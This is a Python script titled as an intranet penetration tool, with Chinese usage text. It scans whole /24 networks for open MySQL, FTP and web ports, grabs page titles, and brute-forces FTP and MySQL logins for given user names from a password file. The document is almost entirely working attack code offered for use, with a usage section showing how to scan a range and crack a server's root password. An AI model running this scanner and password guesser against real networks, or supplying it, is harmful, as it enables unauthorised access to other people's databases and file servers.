Python内网渗透
import ftplib | |
import optparse | |
import os | |
import re | |
import socket | |
import sys | |
import threading | |
import IPy | |
import mysql.connector | |
import requests | |
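# Shared scan results: (ip, port) tuples appended by portScan from every
# worker thread, guarded by `lock`. portScan appends closed ports as well,
# so this is a log of probes, not a list of open services.
routers = []
lock = threading.Lock()
# Default password list: password.txt in the working directory.
# os.path.join picks the platform separator; the previous
# `os.getcwd() + r'\password.txt'` only formed a valid path on Windows
# (on POSIX it named a file literally called "<cwd>\password.txt").
pass_dict = os.path.join(os.getcwd(), 'password.txt')
# Strict dotted-quad IPv4 matcher (each octet 0-255); used by __main__ to
# decide whether the -i value is a single host.
compile_ip = re.compile(r'^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$')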
def search_routers(Bip=None):
    """Probe hosts .1-.254 of the /24 around each base address, on every configured port.

    Args:
        Bip: list of dotted-quad addresses whose first three octets select the
            networks to scan. When None, the local host's own addresses
            (``socket.gethostbyname_ex``) are used.

    Reads the module-level ``port_list`` (set in ``__main__``) and starts one
    ``portScan`` thread per host/port pair, then waits for all of them.
    """
    if Bip is None:
        base_ips = socket.gethostbyname_ex(socket.gethostname())[2]
    else:
        base_ips = Bip

    workers = []
    for base in base_ips:
        # Only the last octet changes, so split once per base address.
        octets = base.split('.')
        for host in range(1, 255):
            octets[3] = str(host)
            target = '.'.join(octets)
            for port in port_list:
                worker = threading.Thread(target=portScan, args=(target, int(port)))
                worker.start()
                workers.append(worker)

    for worker in workers:
        worker.join()
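def portScan(rip, port):
    """TCP-connect probe of ``rip:port``; prints open ports and records the probe.

    Args:
        rip: dotted-quad host address.
        port: TCP port number.

    An open port is printed and, for port 80, ``get_title`` is called to show
    the page title. Both open and closed probes are appended to the shared
    ``routers`` list as ``(rip, port)``, as before; ``__main__`` never reads it.
    """
    # The context manager closes the socket even if connect_ex() raises
    # (e.g. socket.gaierror on a bad host), which previously leaked it.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as scan_link:
        scan_link.settimeout(2)
        result = scan_link.connect_ex((rip, port))

    # `with lock:` releases the lock on any exception. A bare
    # acquire()/release() pair left every other scanning thread blocked
    # forever as soon as get_title raised (its requests.get() call is not
    # inside a try block).
    with lock:
        if result == 0:
            print(rip.ljust(15), f'\t{port}开放')
            if port == 80:
                get_title(rip, port)
        routers.append((rip, port))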
# def portScan(tgtIp, tgtPort): | |
# socket.setdefaulttimeout(1) | |
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
# address = (tgtIp, tgtPort) | |
# try: | |
# s.connect(address) | |
# print('[+] {} : open [{}] '.format(tgtIp, tgtPort)) | |
# except Exception as e: | |
# s.close() | |
# print('[+] {} : closed [{}] error : {}'.format(tgtIp, tgtPort, e)) | |
# s.close() | |
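def get_title(gip, port):
    """Print the HTML <title> of ``http://gip:port`` when the page has one.

    Args:
        gip: host address.
        port: HTTP port.

    A failed request is reported and swallowed so the calling scan thread
    survives; a response without a <title> is skipped silently.
    """
    url = 'http://{}:{}'.format(gip, port)
    try:
        # requests.get() has no default timeout: a host that accepts the TCP
        # connection but never answers would otherwise hang this thread.
        res = requests.get(url=url, timeout=5)
    except requests.RequestException as exc:
        # Previously this call sat outside the try block, so any connection
        # error escaped into portScan.
        print('[request failed] {} {}'.format(url, exc))
        return
    match = re.search(r'<title>(.*)</title>', res.text)
    if match:
        print('[{}] {}'.format(match.group(1), url))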
def brute_ftp(host, pass_file):
    """Try every password in ``pass_file`` for each name in the global ``user`` list against FTP on ``host``.

    Args:
        host: FTP server address.
        pass_file: path of a newline-separated password list.

    Returns:
        True on the first successful login; None when every password has been
        tried for every user (the ``return False`` is commented out).

    Each attempt opens a new control connection and prints the password being
    tried; the password file is reopened once per user name.
    """
    # user = ['root']
    for u in user:
        print('\nFTP用户名 ' + u)
        with open(pass_file, 'r') as f:
            for line in f:
                # Text-mode open() already translates CRLF, so the '\r' strip
                # only matters for a lone '\r' before the '\n'.
                password = line.strip('\r').strip('\n')
                print('尝试密码: ', password)
                try:
                    ftp = ftplib.FTP(host)
                    ftp.login(u, password)
                    print('FTP登录 \033[1;32;40m成功\033[0m!')
                    print('FTP用户名 ' + u)
                    ftp.quit()
                    return True
                except:
                    # Bare except: an unreachable host, a timeout and a
                    # rejected password all print the same "failed" line, and
                    # a KeyboardInterrupt raised during the attempt is
                    # swallowed as well.
                    print('FTP登录 \033[1;31;40m失败\033[0m!')
    # return False
def brute_mysql(host, pass_file):
    """Try every password in ``pass_file`` for each name in the global ``user`` list against MySQL on ``host``.

    Args:
        host: MySQL server address.
        pass_file: path of a newline-separated password list.

    Returns:
        True on the first successful connection; None when every password has
        been tried for every user (the ``return False`` is commented out).

    The password file is reopened once per user name, and each attempt prints
    the password being tried.
    """
    # user = ['root']
    for u in user:
        print('\nMySQL用户名 ' + u)
        with open(pass_file, 'r') as f:
            for line in f:
                # Text-mode open() already translates CRLF, so the '\r' strip
                # only matters for a lone '\r' before the '\n'.
                password = line.strip('\r').strip('\n')
                print('尝试密码: ', password)
                try:
                    # The successful connection is never closed before returning.
                    mydb = mysql.connector.connect(
                        host=host,
                        user=u,
                        passwd=password
                    )
                    print('MySQL登录 \033[1;32;40m成功\033[0m!')
                    print('MySQL用户名 ' + u)
                    return True
                except:
                    # Bare except: an unreachable host, a timeout and a
                    # rejected password all print the same "failed" line, and
                    # a KeyboardInterrupt raised during the attempt is
                    # swallowed as well.
                    print('MySQL登录 \033[1;31;40m失败\033[0m!')
    # return False
if __name__ == '__main__':
    usage = '''直接运行或是输入其他错误参数,扫描本机所在局域网段\n
-o 指定扫描端口,用英文逗号隔开,默认扫描3306(mysql), 21(ftp), 80(http), 443(https)\n
扫描指定网段/ip:-i 网段/ip,如10.20.24.0/24,192.168.123.0\n
爆破指定服务:-b ftp/mysql -i ip -u 指定用户名列表,用英文逗号隔开 -p 指定密码文件\n
举例:demo -b mysql -i 127.0.0.1 -u root,admin -p C:\password.txt
爆破127.0.0.1的mysql服务器密码,爆破用户名root和admin的密码\n
demo -i 10.20.24.0/24
扫描10.20.24.0/255.255.255.0网段下所有主机的服务
'''
    parse = optparse.OptionParser(usage=usage)
    parse.add_option('-i', dest='add', type=str, help='网段或ip地址')
    parse.add_option('-b', dest='server', type=str, help='爆破指定服务')
    parse.add_option('-u', dest='user', type=str, help='爆破用户名')
    parse.add_option('-p', dest='pass_dict', type=str, help='密码文件')
    parse.add_option('-o', dest='port_list', type=str, help='指定端口')
    options, argv = parse.parse_args()

    # Command-line values override the module defaults. `user` and `port_list`
    # are module globals read by brute_ftp/brute_mysql and search_routers.
    if options.pass_dict is not None:
        pass_dict = options.pass_dict
    user = ['root'] if options.user is None else options.user.split(',')
    if options.port_list is None:
        port_list = ['3306', '21', '80', '443']
    else:
        port_list = options.port_list.split(',')

    # No target: show the usage text and scan the local host's own /24s.
    if options.add is None:
        print(parse.usage)
        search_routers()
        sys.exit()

    # -b selects a credential check; pass_dict already holds the -p value
    # when one was given, so a single call covers both cases.
    brute_by_service = {'ftp': brute_ftp, 'mysql': brute_mysql}
    if options.server in brute_by_service:
        brute_by_service[options.server](options.add, pass_dict)
        sys.exit()

    # A bare address must be a valid dotted quad; anything else falls back to
    # the usage text and a local scan.
    if '/' not in options.add:
        if compile_ip.match(options.add):
            search_routers([options.add])
        else:
            print(parse.usage)
            search_routers()
        sys.exit()

    # Network notation: collapse every address of the range to its x.y.z.0
    # network, keeping first-seen order, so each /24 is scanned once.
    networks = []
    for ip in IPy.IP(options.add):
        octets = str(ip).split('.')
        network = f'{octets[0]}.{octets[1]}.{octets[2]}.0'
        if network not in networks:
            networks.append(network)
    search_routers(networks)
    sys.exit()
# search_routers(['10.20.24.0']) | |
# search_routers() | |
# python -m pip install -i https://pypi.tuna.tsinghua.edu.cn/simple mysql-connector IPy |